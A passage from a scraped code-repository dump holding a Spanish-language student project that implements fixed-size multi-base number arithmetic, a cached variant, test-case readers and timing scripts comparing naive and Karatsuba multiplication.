other):\r\n \"\"\"\r\n Funcion que verifica si self es igual a other\r\n \"\"\"\r\n return self.int() == other.int()\r\n \r\n def Verificaciones(self,other):\r\n \"\"\"\r\n Funcion encargada de verificar si al hacer cierta operacion estan en la misma base\r\n y son de la misma clase\r\n \"\"\"\r\n if not isinstance(other,Num): raise Exception(f\"other no es tipo Num\") \r\n if not self.base == other.base: raise Exception(f\"La base self {self.base} != La base other {other.base}\")\r\n return True\r\n \r\n def __add__(self,other):\r\n \"\"\"\r\n suma de dos numeros de la propia clase Numero, esta toma caracter(int) por caracter(int) de atras hacia delante\r\n y los suma, tambien se acarrea si es necesario\r\n Toma las listas de self y other despues las recorre dependiendo de cual de los dos sea mas grande \r\n \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,3] Lista de self base 10\r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,3] Lista de other base 10\r\n +-------------------------------\r\n [1,2,6]\r\n \"\"\"\r\n self.Verificaciones(other)\r\n \r\n Residuo=0#lleva los decimales centenas ... que superen la capacidad de la respectiva unidad\r\n suma=0\r\n new=[] \r\n for i in range(15,self.size-max(len(other),len(self))-1,-1):\r\n suma = self[i] + other[i]\r\n suma += Residuo\r\n if suma >= self.base:\r\n if i == self.size-max(len(other),len(self)):\r\n new.append(suma-self.base)\r\n new.append(suma//self.base)\r\n else:\r\n new.append(suma-self.base)\r\n Residuo = suma//self.base\r\n else:\r\n new.append(suma)\r\n Residuo = 0\r\n new = new[::-1]\r\n if self.Complemento == True or other.Complemento == True: #Aqui verifico si alguno de los numeros es negativo\r\n if new[1] == self.base-1: return Num(new[len(new)-self.size:len(new)],self.base,True)# si el resultado es negativo\r\n else: return Num(new[len(new)-self.size:len(new)],self.base)\r\n return Num(new,self.base)\r\n \r\n def __mul__ (self,other):\r\n \"\"\"\r\n Funcion encargada de multiplicar de la forma ,suma de self una cantidad de veces other despues los voy\r\n acumulando para el resultado final\r\n \r\n other.ListaN = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2]\r\n self.ListaN = [0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2]\r\n \r\n primero sumo el 222, 2 veces y obtengo = [0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4] base 10\r\n despues sumo el 222, 1 vez y obtengo = [0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2]\r\n finalmente es necesario correr la lista anterior un cero a la izq [0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,0]\r\n\r\n Despues de los pasos anteriores\r\n se suman y obtenemos \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4] \r\n [0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,0]\r\n +-------------------------------\r\n [0,0,0,0,0,0,0,0,0,0,0,0,2,6,6,4]\r\n \r\n \"\"\"\r\n self.Verificaciones(other)\r\n resultado = Num(0,self.base)#Este Num guarda la suma de cada multiplicacion que se hace\r\n resultado_final = Num(0,self.base)\r\n self_copy = copy.copy(self)\r\n aux=copy.copy(other)\r\n if other.Complemento: aux = copy.copy(~other) #estos dos if verifican si alguno de los numeros es negativo\r\n if self.Complemento: self_copy = ~self_copy #y si encuentra uno lo pasa a positivo\r\n contador = 0\r\n Valor = str(aux.int())\r\n Valor = Valor[::-1]\r\n for i in Valor: #De aqui obtengo la cantidad de veces que será sumado self_copy \r\n aux = Num(i,self.base) \r\n while aux > Num(0,self.base):\r\n aux -= Num(1,self.base)\r\n resultado += self_copy \r\n resultado = resultado << contador \r\n resultado_final += resultado\r\n resultado = Num(0,self.base)\r\n contador+=1\r\n \r\n if (other.Complemento and self.Complemento==False) or (other.Complemento==False and self.Complemento):\r\n return ~resultado_final \r\n else:\r\n return resultado_final \r\n \r\n def __floordiv__(self,other):\r\n \"\"\"\r\n Esta funcion es para la division, Se usa un contador para ver cuantas veces se tiene que sumar other \r\n para que sea menor si no se puede llegar a ser igual que self,o igual si se puede, operador // \r\n \r\n \"\"\" \r\n self.Verificaciones(other)\r\n self_copy = copy.copy(self)\r\n aux = copy.copy(other)\r\n other_copy = copy.copy(other)\r\n contador=Num(0,self.base)\r\n if other.Complemento:\r\n aux = copy.copy(~other)\r\n other_copy = copy.copy(~other)\r\n if self.Complemento:\r\n self_copy = copy.copy(~self_copy)\r\n \r\n while aux <= self_copy:\r\n if aux <= self_copy:\r\n contador += Num(1,self.base)\r\n aux += other_copy\r\n if (other.Complemento and self.Complemento==False) or (other.Complemento==False and self.Complemento):\r\n return ~contador \r\n else:\r\n return contador\r\n \r\n \r\n def __mod__(self,other):\r\n \"\"\"\r\n Sobrecarga del operador % retorna el mod de self / other \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,5] self.ListaN -----> [5] |[2] -----> [2] * [2] = [4] ---> [5] + ~[4] = [1] \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2] other.ListaN [4] |____ \r\n - --- 2\r\n [1]\r\n \r\n \"\"\" \r\n self.Verificaciones(other)\r\n return self-(self//other)*other\r\n \r\n \r\n def __pow__(self,other):\r\n \"\"\"\r\n Sobrecarga del operador ** aqui se multiplica self cantidad de veces other\r\n \"\"\"\r\n\r\n self.Verificaciones(other)\r\n self_copy = copy.copy(self)\r\n aux = copy.copy(other)\r\n other_copy = copy.copy(other)\r\n resultado=Num(1,self.base)\r\n if other.Complemento: raise(\"La sobrecarga division x**n no sirve con n negativos\")\r\n while aux > Num(0,self.base):\r\n resultado = resultado * self_copy\r\n aux -= Num(1,other.base)\r\n return resultado\r\n\r\n def __sub__(self,other):\r\n \"\"\"\r\n Algoritmo consiste en la implementacion de la resta clasica\r\n \r\n other.ListaN = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2] base = 10\r\n ~other.ListaN = [9,9,9,9,9,9,9,9,9,9,9,9,9,9,8,8]\r\n self.ListaN = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,5] \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,5]\r\n [9,9,9,9,9,9,9,9,9,9,9,9,9,9,8,8]\r\n - -------------------------------- \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,3]\r\n \r\n \r\n \r\n \"\"\"\r\n self.Verificaciones(other)\r\n return self + ~other\r\n \r\n"
},
{
"alpha_fraction": 0.5164259672164917,
"alphanum_fraction": 0.5259690880775452,
"avg_line_length": 36.451297760009766,
"blob_id": "958a613980bf026bc288275b1f55acb12936b3f0",
"content_id": "9123283fceb6ad40d58a92b30d0058a2e1bca1b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11844,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 308,
"path": "/Karatsuba/src/Num_con_cache.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:402420750\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\ngroup:04-08am\r\n\"\"\"\r\nfrom CheckNum import *\r\nimport copy\r\nfrom functools import lru_cache #Aqui se importa el cache\r\n\r\nclass NumC:\r\n base=10\r\n size=16\r\n cadena=\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n def __init__(self,numero,Base = 10,complemento = False):\r\n \"\"\"\r\n convierte los numeros del compilador a numeros propios de la clase verifica que esten en la base \r\n y que el tamaño no exceda 16\r\n \"\"\"\r\n \r\n if CheckNum.Check(numero,Base) and CheckNum.Size(numero):\r\n self.cache = dict()\r\n self.Complemento = complemento\r\n self.base=Base\r\n if type(numero) == list: \r\n self.ListaN = copy.copy(numero)\r\n self.ListaN = [0]* (self.size - len(self.ListaN)) + self.ListaN\r\n \r\n else:\r\n self.ListaN = CheckNum.ConvertListtoint(str(numero))\r\n self.ListaN = [0] * (self.size - len(self.ListaN)) + self.ListaN\r\n \r\n \r\n def __invert__(self):\r\n \"\"\"\r\n Funcion que crea el complemento\r\n \"\"\"\r\n listaInv = []\r\n for i in range(self.size):\r\n listaInv.append(self.base-1 - self[i])\r\n if self.Complemento == True:\r\n return NumC(listaInv,self.base,False) + NumC(1,self.base,False)\r\n return NumC(listaInv,self.base,True) + NumC(1,self.base,False)\r\n \r\n def Negativos(self):\r\n \"\"\"\r\n Funcion encargada de mostrar un negativo al usuario\r\n \"\"\"\r\n aux = copy.copy(~self)\r\n if self.base < 11: return int(\"-\" + str(aux.int()))\r\n else: return \"-\" + self.base_mayor_10()\r\n \r\n \r\n def show_number(self):\r\n \"\"\"\r\n Funcion encargada de mostrar los numeros al usuario\r\n \"\"\"\r\n if self.Complemento:\r\n return self.Negativos()\r\n else:\r\n if self.base < 11:\r\n return self.int()\r\n else:\r\n return self.base_mayor_10()\r\n \r\n def base_mayor_10(self):\r\n \"\"\"\r\n Funcion encargada de transformar un numero en base mayor a 10 con sus respectivas letras dependiendo de la base\r\n \"\"\"\r\n if self.Complemento: self_copy = copy.copy(~self)\r\n else: self_copy = copy.copy(self)\r\n numero = \"\"\r\n contador = 0\r\n while self_copy[contador] == 0 and contador<15:\r\n contador+=1\r\n new = []\r\n new = self_copy.ListaN[contador:16]\r\n for i in new:\r\n numero += self.cadena[i] \r\n return numero \r\n \r\n def __eq__(self,other):\r\n \"\"\"Sobrecarga de == que verifica si dos Num son iguales\"\"\"\r\n return self.int() == other.int()\r\n def __ne__(self,other):\r\n \"\"\"\r\n sobrecarga del operador != devuelve un true si self y other son diferentes\r\n de lo contrario devuelve false\r\n \"\"\"\r\n return str(self.show_number()) != str(other.show_number())\r\n \r\n def int(self):\r\n \"\"\"\r\n Muestra la lista como numeros del compilador\r\n \"\"\"\r\n if self.base > 10:\r\n return self.base_mayor_10()\r\n aux=0\r\n inc=1\r\n for i in range(len(self.ListaN)):\r\n aux+=self.ListaN[-(i+1)]*inc\r\n inc*=10\r\n return aux\r\n\r\n def __getitem__(self,index):\r\n \"\"\"\r\n Muetra los numeros dentro de la lista (eje invertido \"Provicional\")\r\n \"\"\"\r\n return self.ListaN[index]\r\n\r\n\r\n def __len__(self):\r\n \"\"\"\r\n Retorna el tamaño del digito que esta en la lista, si es negativo devuelve 16\r\n \"\"\"\r\n if self.Complemento:return self.size\r\n return(len(str(self.int())))\r\n def __le__(self,other):\r\n \"\"\"\r\n Sobrecarga del operador <= me indica si other es mayor o igual que self\r\n \"\"\"\r\n if self.Complemento==False and other.Complemento==True:return True\r\n elif self.Complemento==True and other.Complemento==False:return False\r\n elif self.int() <= other.int(): return True \r\n return False\r\n \r\n def __gt__(self,other):\r\n \"\"\"\r\n Esta sobrecarga > sirve para mostrar \r\n \"\"\"\r\n if self.Complemento==False and other.Complemento==True: return True\r\n elif self.Complemento==True and other.Complemento==False:return False\r\n elif self.int() > other.int():return True \r\n return False \r\n\r\n def __repr__(self):\r\n \"\"\"\r\n aprovecha la funcion int para mostrar los valores por string\r\n \"\"\"\r\n return f\"(Valor: {self.show_number()}) (Base:{self.base}) (Max:10 **{self.size}) \\n\"#{self.ListaN}\r\n \r\n def __lshift__(self,positions):\r\n \"\"\"\r\n Mueve todos los digitos a la izquierda <<\r\n \"\"\"\r\n if not isinstance(positions,int): raise Exception(\"positions no es un int\") \r\n if positions < 0: raise Exception(f\"El entero {positions} no es positivo\") \r\n aux = copy.copy(self)\r\n list = []\r\n list = aux.ListaN + [0] * positions\r\n aux.ListaN=list[len(list)-self.size:len(list)]\r\n return aux\r\n def __rshift__(self,positions):\r\n \"\"\"\r\n Mueve todos los digitos a la derecha >>\r\n \"\"\"\r\n if not isinstance(positions,int): raise Exception(\"positions no es un int\") \r\n if positions < 0: raise Exception(f\"El entero {positions} no es positivo\") \r\n aux = copy.copy(self)\r\n list=[]\r\n list = [0]* positions + aux.ListaN \r\n aux.ListaN = list[0:self.size]\r\n return aux \r\n \r\n def __eq__(self, other):\r\n return self.int() == other.int()\r\n \r\n def Verificaciones(self,other):\r\n if not isinstance(other,NumC): raise Exception(f\"other no es tipo Num\") \r\n if not self.base == other.base: raise Exception(f\"La base self {self.base} != La base other {other.base}\")\r\n return True\r\n \r\n def __add__(self,other):\r\n \"\"\"\r\n suma de dos numeros de la propia clase Numero, esta toma caracter(int) por caracter(int) de atras hacia delante\r\n y los suma, tambien se acarrea si es necesario\r\n \"\"\"\r\n self.Verificaciones(other)\r\n def suma():\r\n \r\n Residuo=0#lleva los decimales centenas ... que superen la capacidad de la respectiva unidad\r\n suma=0\r\n new=[] \r\n for i in range(15,self.size-max(len(other),len(self))-1,-1):\r\n suma = self[i] + other[i]\r\n suma += Residuo\r\n if suma >= self.base:\r\n if i == self.size-max(len(other),len(self)):\r\n new.append(suma-self.base)\r\n new.append(suma//self.base)\r\n else:\r\n new.append(suma-self.base)\r\n Residuo = suma//self.base\r\n else:\r\n new.append(suma)\r\n Residuo = 0\r\n new = new[::-1]\r\n if self.Complemento == True or other.Complemento == True: #Aqui verifico si alguno de los numeros es negativo\r\n if new[1] == self.base-1: return NumC(new[len(new)-self.size:len(new)],self.base,True)# si el resultado es negativo\r\n else: return NumC(new[len(new)-self.size:len(new)],self.base)\r\n return NumC(new,self.base)\r\n return self.F_cache(suma,other.int(),\"+\")\r\n def __mul__ (self,other):\r\n \"\"\"\r\n Funcion encargada de multiplicar de la forma ,suma de self una cantidad de veces other despues los voy\r\n acumulando para el resultado final\r\n \"\"\"\r\n valor=other.show_number()\r\n def mult():\r\n self.Verificaciones(other)\r\n resultado = NumC(0,self.base)#Este Num guarda la suma de cada multiplicacion que se hace\r\n resultado_final = NumC(0,self.base)\r\n self_copy = copy.copy(self)\r\n aux=copy.copy(other)\r\n if other.Complemento: aux = copy.copy(~other) #estos dos if verifican si alguno de los numeros es negativo\r\n if self.Complemento: self_copy = ~self_copy #y si encuentra uno lo pasa a positivo\r\n contador = 0\r\n Valor = str(aux.int())\r\n Valor = Valor[::-1]\r\n for i in Valor: #De aqui obtengo la cantidad de veces que será sumado self_copy \r\n aux = NumC(i,self.base) \r\n while aux > NumC(0,self.base):\r\n aux -= NumC(1,self.base)\r\n resultado += self_copy \r\n resultado = resultado << contador \r\n resultado_final += resultado\r\n resultado = NumC(0,self.base)\r\n contador+=1\r\n if (other.Complemento and self.Complemento==False) or (other.Complemento==False and self.Complemento):\r\n return ~resultado_final \r\n else:\r\n return resultado_final \r\n return self.F_cache(mult,valor,\"*\")\r\n \r\n def __floordiv__(self,other):\r\n \"\"\"\r\n Esta funcion es para la division, Se usa un contador para ver cuantas veces se tiene que sumar other \r\n para que sea menor si no se puede llegar a ser igual que self,o igual si se puede operador // \r\n \"\"\" \r\n valor=other.show_number()\r\n def div(): \r\n self.Verificaciones(other)\r\n self_copy = copy.copy(self)\r\n aux = copy.copy(other)\r\n other_copy = copy.copy(other)\r\n contador=NumC(0,self.base)\r\n if other.Complemento:\r\n aux = copy.copy(~other)\r\n other_copy = copy.copy(~other)\r\n if self.Complemento:\r\n self_copy = copy.copy(~self_copy)\r\n while aux <= self_copy:\r\n if aux <= self_copy:\r\n contador += NumC(1,self.base)\r\n aux += other_copy\r\n if (other.Complemento and self.Complemento==False) or (other.Complemento==False and self.Complemento):\r\n return ~contador \r\n else:\r\n return contador\r\n return self.F_cache(div,valor,\"//\")\r\n \r\n def __mod__(self,other):\r\n \"\"\"\r\n Sobrecarga del operador % retorna el mod de self / other \r\n \"\"\"\r\n self.Verificaciones(other)\r\n return self-(self//other)*other\r\n \r\n \r\n def __pow__(self,other):\r\n \"\"\"\r\n Sobrecarga del operador ** aqui se multiplica self cantidad de veces other\r\n \"\"\"\r\n valor = other.show_number()\r\n def pow():\r\n self.Verificaciones(other)\r\n self_copy = copy.copy(self)\r\n aux = copy.copy(other)\r\n other_copy = copy.copy(other)\r\n resultado=NumC(1,self.base)\r\n if other.Complemento: raise(\"La sobrecarga division x**n no sirve con n negativos\")\r\n while aux > NumC(0,self.base):\r\n resultado = resultado * self_copy\r\n aux -= NumC(1,other.base)\r\n return resultado\r\n return self.F_cache(pow,valor,\"**\")\r\n\r\n def __sub__(self,other):\r\n \"\"\"\r\n Algoritmo consiste en la implementacion de la resta clasica\r\n \"\"\"\r\n valor = other.show_number()\r\n def sub():\r\n self.Verificaciones(other)\r\n return self + ~other\r\n return self.F_cache(sub,valor,\"~\")\r\n \r\n def F_cache(self,func,other,operador):\r\n \"\"\"\r\n Funcion de controlar, aqui se establece el cache para cada objeto\r\n \"\"\"\r\n find=f\"{other}{operador}\"\r\n if find in self.cache:\r\n return self.cache[find]\r\n else:\r\n self.cache[find]=func()\r\n return self.cache[find]"
},
{
"alpha_fraction": 0.46720001101493835,
"alphanum_fraction": 0.5381333231925964,
"avg_line_length": 40.65909194946289,
"blob_id": "6449ea25d794ad5a6423a5a5eb1280c75ffc14bc",
"content_id": "241168651109aa52e6a60652d05460e9cfb4a32a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1876,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 44,
"path": "/Karatsuba/src/Main.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\ngroup:04-08am\r\n\"\"\"\r\n\r\nfrom Num import*\r\nfrom Knum import *\r\nimport timeit\r\n\r\nif __name__==\"__main__\":\r\n \"\"\"\r\n Pequeño main donde se muestran los resultados de Num y Knum\r\n \"\"\"\r\n print(\"Sistema implementado por los Estudiantes\")\r\n print(\"Andres Zuñiga Calderon(10am) y Braslyn Rodriguez(08am)\")\r\n print(\"Grupo 04-08\")\r\n print(\"************************Clase Num*************************\")\r\n Num1=Num(70000,10)\r\n Num2=Num(10000,10)\r\n print(f\"Num({Num1.show_number()}) + Num({Num2.show_number()}) = {Num1+Num2}\")\r\n print(f\"Num({Num1.show_number()}) + ~ Num({Num2.show_number()}) = {Num1 + ~Num2}\")\r\n print(f\"Num({Num1.show_number()}) * Num({Num2.show_number()}) = {Num1 * Num2}\")\r\n print(f\"Num({Num1.show_number()}) // Num({Num2.show_number()}) = {Num1 // Num2}\")\r\n print(f\"Num({Num1.show_number()}) % Num({Num2.show_number()}) = {Num1 % Num2}\")\r\n print(f\"~Num({Num1.show_number()}) = {~Num1}\")\r\n Num1=Num(70,10)\r\n Num2=Num(10,10)\r\n print(f\"Num({Num1.show_number()}) ** Num({Num2.show_number()}) = {Num1 ** Num2}\")\r\n print()\r\n print(\"************************Clase Knum*************************\")\r\n Num1=Knum(70000,10)\r\n Num2=Knum(10020,10)\r\n print(f\"Knum({Num1.show_number()}) + Knum({Num2.show_number()}) = {Num1+Num2}\")\r\n print(f\"Knum({Num1.show_number()}) + ~ Knum({Num2.show_number()}) = {Num1 + ~Num2}\")\r\n print(f\"Knum({Num1.show_number()}) * Knum({Num2.show_number()}) = {Num1 * Num2}\")\r\n print(f\"Knum({Num1.show_number()}) // Knum({Num2.show_number()}) = {Num1 // Num2}\")\r\n print(f\"Knum({Num1.show_number()}) % Knum({Num2.show_number()}) = {Num1 % Num2}\")\r\n print(f\"~Knum({Num2.show_number()}) = {~Num2}\")\r\n Num1=Knum(70,10)\r\n Num2=Knum(10,10)\r\n print(f\"Knum({Num1.show_number()}) ** Knum({Num2.show_number()}) = {Num1 ** Num2}\")"
},
{
"alpha_fraction": 0.485241174697876,
"alphanum_fraction": 0.5226781964302063,
"avg_line_length": 33.10256576538086,
"blob_id": "3ac1e42eacefb8092a2bb5c81bdc62b763a729a7",
"content_id": "c628faeb5587acb1542bb43f45a558186bbf82d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1390,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 39,
"path": "/Karatsuba/src/CheckNum.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:402420750\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\ngroup:04-08am\r\n\"\"\"\r\nclass CheckNum:\r\n @staticmethod\r\n def Check(num,base):\r\n \"\"\"verifica si un entero o string o lista esta en la base correspondiente\"\"\"\r\n cadena=\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n try: \r\n if type(num)==int:\r\n aux = str(num)\r\n else:\r\n aux = num\r\n for i in range(len(aux)):\r\n if str(aux[i]).isdigit():\r\n int(str(cadena[int(aux[i])]),base) \r\n else:\r\n int(aux[i],base) \r\n except ValueError:\r\n raise Exception(f\"El numero {num} no esta en la base {base}\")\r\n return True \r\n @staticmethod\r\n def ConvertListtoint(num):\r\n \"\"\"Convierte una lista a digitos tipo int adentro\"\"\"\r\n newlist=[]\r\n for i in range(len(num)):\r\n newlist.append(int(str(num[i]),16))\r\n return newlist\r\n def Size(num):\r\n \"\"\"Verifica si una lista o un numero son de tamaño menor que 16\"\"\"\r\n if type(num)==list:\r\n if len(num)>16: raise Exception(f\"El numero {num} excede el tama?o maximo que es 16\")\r\n else:\r\n if len(str(num))>16: raise Exception(f\"El numero {num} excede el tama?o maximo que es 16\")\r\n return True \r\n "
},
{
"alpha_fraction": 0.5196619033813477,
"alphanum_fraction": 0.5332598090171814,
"avg_line_length": 31.085365295410156,
"blob_id": "7f15c4334c1ba20aa9704bdc464ad2d599a4686d",
"content_id": "1ff2c78ec5aea3843138894d0abb5111a2f0e451",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2722,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 82,
"path": "/Karatsuba/src/read_test_cases.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\ngroup:04-08am\r\nMaterial obtenido del profesor Carlos Loria Saenz\r\n\"\"\"\r\nimport time\r\nimport sys\r\nfrom Num import *\r\n\r\n\r\ndef lectura(archivo, llave = None):#utilizo aqui el identificador para saber el tipo de operacion que voy a realizar\r\n \"\"\"\r\n Funcion encargada de leer los .csv de prueba recibe un archivo y un tipo de llave \r\n para especificar la operación que quiero realizar\r\n \"\"\"\r\n print(\"*** Reading Test Cases ***\")\r\n cases = None\r\n total = 0\r\n failed = 0\r\n passed = 0\r\n given = Num(0)\r\n with open(archivo, \"r\") as file: #aqui leo el csv\r\n lines = file.read()\r\n cases = lines.split(\"\\n\")\r\n total = len(cases)\r\n start = time.time()\r\n for case in cases:\r\n # Skips comments\r\n if case.startswith(\"#\"): \r\n continue\r\n (case_num, xval, yval, expected) = (int(n) for n in case.split(\";\"))\r\n print(f\"Processing case {case_num}\")\r\n if llave == \"+\":\r\n expected= Num(expected)\r\n given = Num(xval) + Num(yval) \r\n elif llave == \"-\":\r\n expected= Num(expected)\r\n given = Num(xval)- Num(yval)\r\n elif llave == \"*\":\r\n expected= Num(expected)\r\n given = Num(xval)* Num(yval)\r\n elif llave == \"//\":\r\n expected= Num(expected)\r\n given = Num(xval) // Num(yval)\r\n elif llave == \"%\":\r\n expected= Num(expected)\r\n given = Num(xval)% Num(yval)\r\n elif llave == \"**\":\r\n expected= Num(expected)\r\n given = Num(xval)** Num(yval)\r\n else:#caso si no se especifica una llave valida\r\n expected = Num(expected)\r\n \r\n if given != expected:\r\n print(f\"*** Case {case_num} failed! {given} != {expected} ***\")\r\n failed += 1\r\n else:\r\n print(f\"*** Case {case_num} passes! ***\")\r\n passed += 1\r\n \r\n end = time.time()\r\n print(\"\\n*** Test Case Result ***\")\r\n print(f\"Total cases={total}. Failed={failed} Passed={passed}\")\r\n print(f\"Duration:{(end -start):.4f}sec\")\r\n\r\nif __name__ == \"__main__\":\r\n \"\"\"\r\n para una mayor facilidad se debe enviar tambien con los parametros la llave con la que se va a ejecutar el csv \r\n \"\"\"\r\n llave = None\r\n argumento = sys.argv \r\n if len(argumento) == 1: #No se envio ningun parametro csv se usa por defecto test_01.csv\r\n archivo = \"../test/test_01.csv\"\r\n elif len(argumento) == 2: #se envio un parametro csv\r\n archivo = argumento[1]\r\n else:\r\n archivo = argumento[1]\r\n llave = argumento[2]\r\n lectura(archivo,llave) \r\n "
},
{
"alpha_fraction": 0.49635037779808044,
"alphanum_fraction": 0.5568300485610962,
"avg_line_length": 26.176469802856445,
"blob_id": "a0e3d881649ea618298ac28023d32ba247558d8a",
"content_id": "e7d38cf010fb16b2c2084559c4f1c22ed4e87c32",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 959,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 34,
"path": "/Karatsuba/src/Prueba_cache.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:402420750\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\ngroup:04-08am\r\n\"\"\"\r\n\r\nfrom Num import *\r\nfrom Num_con_cache import *\r\nimport timeit\r\n\r\ndef tocoma(n):\r\n \"\"\"\r\n Esta funcion remplaza un punto por una coma\r\n \"\"\"\r\n return str(n).replace(\".\",\",\")\r\n\r\nif __name__ == \"__main__\":\r\n \"\"\"\r\n Aqui se prueba el cache para ver si llega a ser mas eficiente que la suma de la clase Num\r\n \"\"\"\r\n Num1 = Num(700) \r\n Num2 = Num(1000)\r\n Num3 = NumC(700)\r\n Num4 = NumC(1000)\r\n with open(\"../data/Analisis_De_cache.csv\", \"w\") as file:\r\n file.write(\"n;Num;NumC\\n\") \r\n for i in range(10):\r\n print(\"nueva interaccion\")\r\n time_Num = timeit.timeit(\"Num1 + Num2\", globals=globals(), number=10)\r\n time_NumC = timeit.timeit(\"Num3 + Num4\", globals=globals(), number=10)\r\n file.write(f\"{i};{tocoma(time_Num)};{tocoma(time_NumC)}\\n\")\r\n print(\"Listo!\") "
},
{
"alpha_fraction": 0.4655172526836395,
"alphanum_fraction": 0.6034482717514038,
"avg_line_length": 10,
"blob_id": "a001a8fa09f7d69efb9b43c56a67605b2a2f35a0",
"content_id": "a8010eddc84e46fb3da1cd9da48f7c449a637798",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 14,
"num_lines": 5,
"path": "/Karatsuba/README.txt",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "ISO-8859-10",
"text": "Students:\r\n\tBraslyn Rodriguez (08am)\r\n\tAndres Zuņiga Calderon(10am)\r\nGroup:\r\n\t04-08am"
},
{
"alpha_fraction": 0.4712643623352051,
"alphanum_fraction": 0.5376756191253662,
"avg_line_length": 26.296297073364258,
"blob_id": "b2d3a4a0d2485fd7feed77f1311e35184376e809",
"content_id": "563bbee7b50120fcd11bf90ec044bd7cfd62913b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 783,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 27,
"path": "/Karatsuba/src/Tiempo_KaratsubayNatural.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:402420750\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\n\"\"\"\r\n\r\nfrom Num import *\r\nfrom Knum import *\r\nimport timeit\r\n\r\ndef tocoma(n):\r\n \"\"\"\r\n Esta funcion remplaza un punto por una coma\r\n \"\"\"\r\n return str(n).replace(\".\",\",\")\r\n\r\nif __name__ == \"__main__\":\r\n \r\n with open(\"../data/Analisis_De_tiempo1.csv\", \"w\") as file:\r\n file.write(\"n;Num;Knum\\n\") \r\n for i in range(600):\r\n print(\"nueva interaccion\")\r\n time_Num = timeit.timeit(\"Num(70000) * Num(10000)\", globals=globals(), number=1)\r\n time_Knum = timeit.timeit(\"Knum(70000) * Knum(10000)\", globals=globals(), number=1)\r\n file.write(f\"{i};{tocoma(time_Num)};{tocoma(time_Knum)}\\n\")\r\n print(\"Listo!\") \r\n \r\n \r\n "
}
] | 10 |
wplam107/classification_project | https://github.com/wplam107/classification_project | b3063c81c49b228999cc79f1eab55fad93f27d0a | 8ffbba7f166293e0b2886a910b6f8a415bd7b52e | 8119f30b5b2067be392820e7e09b2fb4b57b3e16 | refs/heads/master | 2021-02-28T09:38:33.065864 | 2020-05-13T15:52:44 | 2020-05-13T15:52:44 | 245,682,563 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7853569984436035,
"alphanum_fraction": 0.7953615188598633,
"avg_line_length": 58.43243408203125,
"blob_id": "1f36ea2ed7f0070ce294f5c7f1bb8f28aa6d008b",
"content_id": "38d229efaf932a68cb10cb9f084c7f74665a3b55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2199,
"license_type": "no_license",
"max_line_length": 170,
"num_lines": 37,
"path": "/README.md",
"repo_name": "wplam107/classification_project",
"src_encoding": "UTF-8",
